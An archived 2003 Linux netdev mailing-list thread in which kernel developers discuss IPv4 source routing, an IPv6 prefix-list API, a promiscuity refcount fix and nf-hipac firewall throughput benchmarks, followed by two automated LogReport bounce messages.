X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Tue, 1 Jul 2003, Ben Greear wrote: > How did you get telnet to bind to a particular local interface? Also, what I tested telnet with replacing the prefsrc, as result, 'ip route get telnet_server_ip_on_eth1' returns local_ip_from_eth0 as src. telnetd listens as usually to 0.0.0.0, incoming connection comes (IP1->IP2), so the server always gets two different IPs... > ping syntax did you use? Did you have to modify either of these applications > to get them to work? Nooo :) 'ping -I IP1 IP2' or if you set IP2's prefsrc to IP1 then even 'ping IP2' works > I looked at the patch...but don't have a good enough grasp of the routing > code to provide a useful critique. I believe my patch _is_ smaller though ;) At least, we have two alternatives :) I'm still not sure whether the "loop" feature will need some tuning in other netsource places. > Thanks, > Ben Regards -- Julian Anastasov From yoshfuji@linux-ipv6.org Tue Jul 1 17:17:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 17:17:47 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h620HK2x019307 for ; Tue, 1 Jul 2003 17:17:34 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h620IRBo030900; Wed, 2 Jul 2003 09:18:27 +0900 Date: Wed, 02 Jul 2003 09:18:25 +0900 (JST) Message-Id: <20030702.091825.72842784.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH] Prefix List against 2.5.70 (re-done) From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <3F008771.5030206@us.ibm.com> References: <20030627.144752.78715628.davem@redhat.com> <20030628.130602.63704890.yoshfuji@linux-ipv6.org> <3F008771.5030206@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3715 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F008771.5030206@us.ibm.com> (at Mon, 30 Jun 2003 11:54:41 -0700), Krishna Kumar says: > Well, there are two reason that I can see to not do so (ADDRCONF flag is already > fixed in earlier patch) : : You do not explain why we (or kernel) NEED(s) this. It is not so important how SMALL it is though it may cause problems how LARGE it is. > About your point about the managed flag, I think it is a per interface flag > that gets returned when a request for getting flags on that interface is made. > That's why I have made it per interface as part of a GETLNKFLAGS operation. > I don't understand why you think it is NEWLINK thing (not sure what you mean by > that), since it is a flag information on your existing device that a RA is > advertising. I want to get this information not on receipt of an RA, but when > a request is made. This is design issue; how we should provide L3 per-interface information to userspace; eg. in_device and/or inet6_dev things including per-interface statistics. Since I think it is not appropriate to provide per-interface statistics via RTM_xxxROUTE, so I don't agree to provide the RA infomation (i.e. Manage/Otherconf Flags) via RTM_xxxROUTE. Options: - use RTM_xxxLINK for L3 operation - introduce RTM_xxxIFACE for L3 per-interface operations I really want to hear from other maintainers here... David? Alexey? Well, on moving forward; you can split your patch up to 3 things: 1. fix routing flags 2. provide Managed/Otherconf flags API (3. provide the prefix list API (if it IS required)) I'm not against the first item. We need to discuss on the design related to the 2nd item. I don't think that we really need 3rd item. Thank you. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From kuznet@ms2.inr.ac.ru Tue Jul 1 22:17:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 22:17:45 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h625HX2x023753 for ; Tue, 1 Jul 2003 22:17:34 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id JAA05258; Wed, 2 Jul 2003 09:17:22 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307020517.JAA05258@dub.inr.ac.ru> Subject: Re: Fw: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in To: davem@redhat.com (David S. Miller) Date: Wed, 2 Jul 2003 09:17:22 +0400 (MSD) Cc: jmorris@redhat.com, netdev@oss.sgi.com, lunz@falooley.org In-Reply-To: <20030701.155051.104064679.davem@redhat.com> from "David S. Miller" at Jul 01, 2003 03:50:51 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3716 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I can't see any reason to be mucking about with the device promiscuity > on NETDEV_DOWN and NETDEV_UP events in the first place. I do not remember why protocols (i.e. IP) withdraw multicast lists on device down too. :-) > The attached > patch seems to fix all the cases I can think of. I think it is right. Actually, if to follow the tradition, we could do the same thing as IP does (remembering that mc record is not loaded), but it looks really useless. Dave, the patch looks OK. Alexey PS. Wow! X-MIME-Autoconverted: from 8bit to quoted-printable by oss.sgi.com id h61MHp2x016322 X-MIME-Autoconverted: from quoted-printable to 8bit by devserv.devel.redhat.com id h61MI0K27113 Mime-Version: 1.0 (modified by Mew) Content-Transfer-Encoding: quoted-printable (modified by Mew) All three agents (oss, redhat and your mailer) are damn smart. Rare mail will pass through this uncorrupted, I guess. :-) From pekkas@netcore.fi Tue Jul 1 22:30:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 22:30:56 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h625UH2x024116 for ; Tue, 1 Jul 2003 22:30:18 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h625U7X23499; Wed, 2 Jul 2003 08:30:07 +0300 Date: Wed, 2 Jul 2003 08:30:07 +0300 (EEST) From: Pekka Savola To: Michael Bellion and Thomas Heinz cc: linux-kernel@vger.kernel.org, Subject: Re: [ANNOUNCE] nf-hipac v0.8 released In-Reply-To: <3EFF1349.6020802@hipac.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3717 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev Hi, Thanks for your clarification. We've also conducted some tests with bridging firewall functionality, and we're very pleased with nf-hipac's performance! Results below. In the measurements, tests were run through a bridging Linux firewall, with a netperf UDP stream of 1450 byte packets (launched from a different computer connected with gigabit ethernet), with a varying amount of filtering rules checks for each packet. I don't have the specs of the Linux PC hardware handy, but I recall they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc. Shouldn't be a factor here. 1. Filtering based on source address only, for example: $fwcmd -A $MAIN -p udp -s 10.0.0.1 -j DROP ... $fwcmd -A $MAIN -p udp -s 10.0.3.255 -j DROP $fwcmd -A $MAIN -p udp -j ACCEPT Results: rules | plain NF | NF-HIPAC | sent | got thru | sent | got thru | (n.o) | (Mbit/s) | (Mbit/s) | (Mbit/s) | (Mbit/s) | ------------------------------------------------------------- 0 | 956,00 | 953,24 | 956,00 | 953,24 | 512 | 956,00 | 800,68 | 956,46 | 952,81 | 1024 | 956,00 | 472,78 | 956,46 | 952,81 | 2048 | 955,99 | 170,52 | 956,46 | 952,86 | 3072 | 956,00 | 51,97 | 956,46 | 952,85 | 2. Filtering based on UDP protocol's source port, for example: $fwcmd -A $MAIN -p udp --source-port 1 -j DROP ... $fwcmd -A $MAIN -p udp --source-port 1024 -j DROP $fwcmd -A $MAIN -p udp -j ACCEPT Results: rules | plain NF | NF-HIPAC | sent | got thru | sent | got thru | (n.o) | (Mbit/s) | (Mbit/s) | (Mbit/s) | (Mbit/s) | ------------------------------------------------------------- 0 | 955,37 | 954,33 | 956,46 | 952,85 | 512 | 980,68 | 261,41 | 956,46 | 951,92 | 1024 | N/A | N/A | 956,47 | 952,86 | 2048 | N/A | N/A | 956,46 | 952,85 | 3072 | N/A | N/A | 956,46 | 952,85 | N/A = Netfilter bridging can't handle this at all, no traffic can pass the bridge. So, plain Netfilter can tolerate about a couple of hundred rules checking for addresses and/or ports on a gigabit line. With HIPAC Netfilter, packet loss is very low, less than 0.5%, even with the maximum number (of tested) rules, the same amount as without filtering at all. On Sun, 29 Jun 2003, Michael Bellion and Thomas Heinz wrote: > You wrote: > >>We are going to test the stuff tomorrow on an i386 and tell you > >>the results afterwards. > > Well, nf-hipac works fine together with the ebtables patch for 2.4.21 > on an i386 machine. We expect it to work with other patches too. > > >>In principle, nf-hipac should work properly whith the bridge patch. > >>We expect it to work just like iptables apart from the fact that > >>you cannot match on bridge ports. > > Well, this statement holds for the native nf-hipac in/out interface > match but of course you can match on bridge ports with nf-hipac > using the iptables physdev match. So everything should be fine :) > > > One obvious thing that's missing in your performance and Roberto's figures > > is what *exactly* are the non-matching rules. Ie. do they only match IP > > address, a TCP port, or what? (TCP port matching is about a degree of > > complexity more expensive with iptables, I recall.) > > [answered in private e-mail] > > > Regards, > > +-----------------------+----------------------+ > | Michael Bellion | Thomas Heinz | > | | | > +-----------------------+----------------------+ > > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From nf@hipac.org Wed Jul 2 05:27:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 05:27:19 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62CRB2x032309 for ; Wed, 2 Jul 2003 05:27:13 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62CQwfZ012757; Wed, 2 Jul 2003 14:26:59 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id OAA27042; Wed, 2 Jul 2003 14:26:57 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19XghM-0007HJ-00; Wed, 02 Jul 2003 14:26:56 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: Pekka Savola Subject: Re: [ANNOUNCE] nf-hipac v0.8 released Date: Wed, 2 Jul 2003 14:26:56 +0200 User-Agent: KMail/1.5.2 References: In-Reply-To: Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307021426.56138.nf@hipac.org> X-archive-position: 3718 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi Pekka > Thanks for your clarification. We've also conducted some tests with > bridging firewall functionality, and we're very pleased with nf-hipac's > performance! Results below. Great, thanks a lot. Your tests are very interesting for us as we haven't done any gigabit or SMP tests yet. > In the measurements, tests were run through a bridging Linux firewall, > with a netperf UDP stream of 1450 byte packets (launched from a different > computer connected with gigabit ethernet), with a varying amount of > filtering rules checks for each packet. > I don't have the specs of the Linux PC hardware handy, but I recall > they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc. Since real world network traffic always consists of a lot of different sized packets taking maximum sized packets is very euphemistic. 1450 byte packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. We are really interested in how our algorithm performs at higher packet rates. Our performance tests are based on 100 Mbit hardware so we coudn't test with more than approx. 80,000 packets/sec even with minimum sized packets. At this packet rate we were hardly able to drive the algorithm to its limit, even with more than 25000 rules involved (and our test system was 1.3 GHz uniprocessor). We'd appreciate it very much if you could run additional tests with smaller packet sizes (including minimum packet size). This way we can get an idea of whether our SMP optimizations work and whether our algorithm in general would benefit from further fine tuning. Regards +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From P@draigBrady.com Wed Jul 2 06:14:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 06:14:59 -0700 (PDT) Received: from corvil.com (gate.corvil.net [213.94.219.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62DEj2x000525 for ; Wed, 2 Jul 2003 06:14:47 -0700 Received: from draigBrady.com (pixelbeat.local.corvil.com [172.18.1.170]) by corvil.com (8.12.9/8.12.5) with ESMTP id h62DEWlT084256; Wed, 2 Jul 2003 14:14:33 +0100 (IST) (envelope-from P@draigBrady.com) Message-ID: <3F02D964.7050301@draigBrady.com> Date: Wed, 02 Jul 2003 14:08:52 +0100 From: P@draigBrady.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030617 X-Accept-Language: en-us, en MIME-Version: 1.0 To: nf@hipac.org CC: Pekka Savola , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> In-Reply-To: <200307021426.56138.nf@hipac.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by corvil.com id h62DEWlT084256 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62DEj2x000525 X-archive-position: 3719 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: P@draigBrady.com Precedence: bulk X-list: netdev Michael Bellion and Thomas Heinz wrote: > Hi Pekka > > >>Thanks for your clarification. We've also conducted some tests with >>bridging firewall functionality, and we're very pleased with nf-hipac's >>performance! Results below. > > > Great, thanks a lot. Your tests are very interesting for us as we haven't done > any gigabit or SMP tests yet. > >>In the measurements, tests were run through a bridging Linux firewall, >>with a netperf UDP stream of 1450 byte packets (launched from a different >>computer connected with gigabit ethernet), with a varying amount of >>filtering rules checks for each packet. >>I don't have the specs of the Linux PC hardware handy, but I recall >>they're *very* highend dual-P4's, like 2.4Ghz, very fast PCI bus, etc. > > Since real world network traffic always consists of a lot of different sized > packets taking maximum sized packets is very euphemistic. 1450 byte packets > at 950 Mbit/s correspond to approx. 80,000 packets/sec. > We are really interested in how our algorithm performs at higher packet rates. > Our performance tests are based on 100 Mbit hardware so we coudn't test with > more than approx. 80,000 packets/sec even with minimum sized packets. Interrupt latency is the problem here. You'll require napi et. al to get over this hump. > At this > packet rate we were hardly able to drive the algorithm to its limit, even > with more than 25000 rules involved (and our test system was 1.3 GHz > uniprocessor). Cool. The same sort of test with ordinary netfilter that I did showed it could only handle around 125 rules at this packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. # ./readprofile -m /boot/System.map | sort -nr | head -30 6779 total 0.0047 4441 default_idle 69.3906 787 handle_IRQ_event 7.0268 589 ip_packet_match 1.6733 433 ipt_do_table 0.6294 106 eth_type_trans 0.5521 56 kfree 0.8750 46 skb_release_data 0.3194 37 add_timer_randomness 0.1542 35 alloc_skb 0.0781 30 __kmem_cache_alloc 0.1172 27 kmalloc 0.3375 23 ip_rcv 0.0342 22 do_gettimeofday 0.1964 20 netif_rx 0.0521 19 __kfree_skb 0.0540 18 add_entropy_words 0.1023 15 __constant_c_and_count_memset 0.0938 13 batch_entropy_store 0.0813 12 kfree_skbmem 0.1071 11 netif_receive_skb 0.0208 7 nf_iterate 0.0437 7 nf_hook_slow 0.0175 6 process_backlog 0.0221 5 batch_entropy_process 0.0223 5 add_interrupt_randomness 0.0781 3 kmem_cache_free 0.0625 2 ipt_hook 0.0312 1 write_profile 0.0156 1 ip_promisc_rcv_finish 0.0208 Pádraig. From nf@hipac.org Wed Jul 2 06:48:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 06:48:39 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62DmT2x001337 for ; Wed, 2 Jul 2003 06:48:30 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62DmLfZ032855; Wed, 2 Jul 2003 15:48:21 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id PAA113215; Wed, 2 Jul 2003 15:48:20 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19Xhy8-0007Pk-00; Wed, 02 Jul 2003 15:48:20 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: P@draigbrady.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released Date: Wed, 2 Jul 2003 15:48:19 +0200 User-Agent: KMail/1.5.2 References: <200307021426.56138.nf@hipac.org> <3F02D964.7050301@draigBrady.com> In-Reply-To: <3F02D964.7050301@draigBrady.com> Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Message-Id: <200307021548.19989.nf@hipac.org> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62DmT2x001337 X-archive-position: 3720 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi Pádraig > > Since real world network traffic always consists of a lot of different > > sized packets taking maximum sized packets is very euphemistic. 1450 byte > > packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. > > We are really interested in how our algorithm performs at higher packet > > rates. Our performance tests are based on 100 Mbit hardware so we coudn't > > test with more than approx. 80,000 packets/sec even with minimum sized > > packets. > > Interrupt latency is the problem here. You'll require napi et. al > to get over this hump. Yes we know, but with 128 byte frame size you can archieve a packet rate of at most 97,656 packets/sec (in theory) on 100 Mbit hardware. We don't think this few more packets would have changed the results fundamentally, so it's probably not worth it on 100 Mbit. Certainly you are right, that napi is required on gigabit to saturate the link with small sized packets. > Cool. The same sort of test with ordinary netfilter that > I did showed it could only handle around 125 rules at this > packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. > > # ./readprofile -m /boot/System.map | sort -nr | head -30 > 6779 total 0.0047 > 4441 default_idle 69.3906 > 787 handle_IRQ_event 7.0268 > 589 ip_packet_match 1.6733 > 433 ipt_do_table 0.6294 > 106 eth_type_trans 0.5521 > [...] What do you want to show with this profile? Most of the time is spend in the idle loop and in icq handling and only a few percentage in ip_packet_match and ipt_do_table, so we don't quite get how this matches your statement above. Could you explain this in a few words? Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From or@logreport.org Wed Jul 2 07:00:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:00:28 -0700 (PDT) Received: from hibou.logreport.org (postfix@logreport.IAE.nl [212.61.24.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62E0N2x001805 for ; Wed, 2 Jul 2003 07:00:24 -0700 Received: by hibou.logreport.org (Postfix, from userid 1005) id CBEC3C052; Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Type: text/plain; name="lr_log2mail.common.lr_tag-20030702160003-4776.4NuBoD.errors" Content-Disposition: inline; filename="lr_log2mail.common.lr_tag-20030702160003-4776.4NuBoD.errors" MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: netdev@oss.sgi.com From: log@logreport.org Subject: [LogReport] Error in common report (was: [LogReport] common report (was: Re: Movie)) Reply-To: support@logreport.org Message-Id: <20030702140021.CBEC3C052@hibou.logreport.org> Date: Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62E0N2x001805 X-archive-position: 3721 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: log@logreport.org Precedence: bulk X-list: netdev WARNING: Logfile may be bogus. There were 319 errors on the 319 lines in the log. This may be because you sent a log file that doesn't strictly contain common logs. This is probable if you sent a syslog log file without filtering it to keep only the logs relevant to the common service. It could also be because you sent a log file in the wrong format or a file that isn't a common log file. A report was generated for the 0 records that could be extracted from your log file. From P@draigBrady.com Wed Jul 2 07:29:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:29:28 -0700 (PDT) Received: from corvil.com (gate.corvil.net [213.94.219.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62ETG2x002532 for ; Wed, 2 Jul 2003 07:29:18 -0700 Received: from draigBrady.com (pixelbeat.local.corvil.com [172.18.1.170]) by corvil.com (8.12.9/8.12.5) with ESMTP id h62ETAlT092982; Wed, 2 Jul 2003 15:29:14 +0100 (IST) (envelope-from P@draigBrady.com) Message-ID: <3F02EAE2.8050609@draigBrady.com> Date: Wed, 02 Jul 2003 15:23:30 +0100 From: P@draigBrady.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030617 X-Accept-Language: en-us, en MIME-Version: 1.0 To: nf@hipac.org CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> <3F02D964.7050301@draigBrady.com> <200307021548.19989.nf@hipac.org> In-Reply-To: <200307021548.19989.nf@hipac.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by corvil.com id h62ETAlT092982 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62ETG2x002532 X-archive-position: 3722 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: P@draigBrady.com Precedence: bulk X-list: netdev Michael Bellion and Thomas Heinz wrote: > Hi Pádraig > > >>>Since real world network traffic always consists of a lot of different >>>sized packets taking maximum sized packets is very euphemistic. 1450 byte >>>packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. >>>We are really interested in how our algorithm performs at higher packet >>>rates. Our performance tests are based on 100 Mbit hardware so we coudn't >>>test with more than approx. 80,000 packets/sec even with minimum sized >>>packets. >> >>Interrupt latency is the problem here. You'll require napi et. al >>to get over this hump. > > Yes we know, but with 128 byte frame size you can archieve a packet rate of at > most 97,656 packets/sec (in theory) on 100 Mbit hardware. We don't think this > few more packets would have changed the results fundamentally, so it's > probably not worth it on 100 Mbit. I was testing with 64 byte packets (so around 190Kpps). e100 cards at least have a handy mode for continually sending a packet as fast as possible. Also you can use more than one interface. So 100Mb is very useful for testing. For the test below I was using a rate of around 85Kpps. > Certainly you are right, that napi is required on gigabit to saturate the link > with small sized packets. > >>Cool. The same sort of test with ordinary netfilter that >>I did showed it could only handle around 125 rules at this >>packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. >> >># ./readprofile -m /boot/System.map | sort -nr | head -30 >> 6779 total 0.0047 >> 4441 default_idle 69.3906 >> 787 handle_IRQ_event 7.0268 >> 589 ip_packet_match 1.6733 >> 433 ipt_do_table 0.6294 >> 106 eth_type_trans 0.5521 >> [...] > > What do you want to show with this profile? Most of the time is spend in the > idle loop and in irq handling and only a few percentage in ip_packet_match > and ipt_do_table, so we don't quite get how this matches your statement > above. Could you explain this in a few words? Confused me too. The system would lock up and start dropping packets after 125 rules. I.E. it would linearly degrade as more rules were added. I'm guessing there is a fixed interrupt overhead that is accounted for by default_idle? Note the e1000 drivers were left in the default config so there could definitely be some tuning done here. Note I changed netfilter slightly to accept promiscuous traffic which is done in ip_rcv() and then the packets are just dropped after the (match any in the test case) rules are traversed. Pádraig. From or@logreport.org Wed Jul 2 07:33:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:33:30 -0700 (PDT) Received: from hibou.logreport.org (postfix@logreport.IAE.nl [212.61.24.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62EXB2x002870 for ; Wed, 2 Jul 2003 07:33:12 -0700 Received: by hibou.logreport.org (Postfix, from userid 1005) id 106D5C039; Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Type: text/plain; name="report.txt" Content-Disposition: inline; filename="report.txt" MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: netdev@oss.sgi.com From: log@logreport.org Subject: [LogReport] common report (was: Re: Movie) Reply-To: support@logreport.org Message-Id: <20030702140021.106D5C039@hibou.logreport.org> Date: Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62EXB2x002870 X-archive-position: 3723 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: log@logreport.org Precedence: bulk X-list: netdev Report generated: 2003-07-02 16:00:16 CEST Reporting on period: Unknown Period Activity Reports ---------------- Number of Requests Served by 1d Period No content in report. Total Size of Requests Served By 1d Period No content in report. User Sessions By 1d Period No content in report. Number of Requests Served by 1h Timeslot Timeslot Requests % Total ------------------------------------------------------- -------- ------- 00:00 0 NaN 01:00 0 NaN 02:00 0 NaN 03:00 0 NaN 04:00 0 NaN 05:00 0 NaN 06:00 0 NaN 07:00 0 NaN 08:00 0 NaN 09:00 0 NaN 10:00 0 NaN 11:00 0 NaN 12:00 0 NaN 13:00 0 NaN 14:00 0 NaN 15:00 0 NaN 16:00 0 NaN 17:00 0 NaN 18:00 0 NaN 19:00 0 NaN 20:00 0 NaN 21:00 0 NaN 22:00 0 NaN 23:00 0 NaN Number of Requests by Request's Size No content in report. Total size of requests served by directory, Top 10 No content in report. Visitors Reports ---------------- Number of Requests by Client Hosts, Top 10 No content in report. Total size of requests by Client Hosts, Top 10 No content in report. Requests By Top Level Domain The "top level domain" is determined from the hostname of the client. There is no real correlation to where the user is geographically located. For example, a client connecting from the hostname ppp10.nl-div.globalcorp.co.uk will get listed as a United Kindom top level domain, even when that user is connecting from a division in The Netherlands. No content in report. Accessed Pages Reports ---------------------- Applied filter in this section: excluded requests matching "\.(png|gif|jpg|jpeg|css)$" Number of Requests Served by 1d Period No content in report. Most Requested Pages, Top 10 No content in report. Most Requested URLs, Top 10, Top 5 URLs No content in report. Session Reports --------------- First Page In User Session, Top 10 - means that only images were requested. No content in report. Last Page In User Session, Top 10 - means that only images were requested. No content in report. User Sessions by Their Recurrence No content in report. Visit Duration Duration is given in seconds. No content in report. Number of Pages per Visit No content in report. Top Traversals, Top 10 Start Page, Top 5 2nd Pages, Top 5 3rd Page No content in report. Download Reports ---------------- Applied filter in this section: selected requests matching \.(gz|tgz|zip|exe|pdf|doc)$ Number of Requests Served by 1d Period No content in report. Most Requested Pages, Top 10 No content in report. Most Requested URLs, Top 10, Top 5 URLs No content in report. Browsers and Platforms Reports ------------------------------ Top 10 Requests By Browser The "browser" is determined from the User-Agent header. It is possible for a user to change that string. This means that the value Internet Explorer could be sent by a user running a customized version of Mozilla. No content in report. Top 10 Requests By Operating System The "operating system" is determined from the User-Agent header. It is possible for a user to change that string. This means that the value Mac PowerPC could be attributed to a user who is really running a customized version of Mozilla under GNU/Linux. No content in report. Top 10 Requests By Browser Language The "language" is determined from the User-Agent header. Users can set this variable to indicate their preferred language. No content in report. Top 10 Requests By Robot No content in report. Search Engines and "Referers" ----------------------------- Applied filter in this section: excluded requests with a referer matching "^-$" Top 10 Referring Sites No content in report. Top 10 Referring Pages No content in report. Top Referring Pages By Requested Page, Top 5 Referrers, Top 10 Pages No content in report. Most Travelled Referer -> Pages Connection, Top 10 No content in report. Requests By Search Engine No content in report. Requests By Keywords, Top 10 No content in report. Requests by Search Engine with Keywords, Top 10 Search Engines, Top 5 Keywords No content in report. Abuse Reports 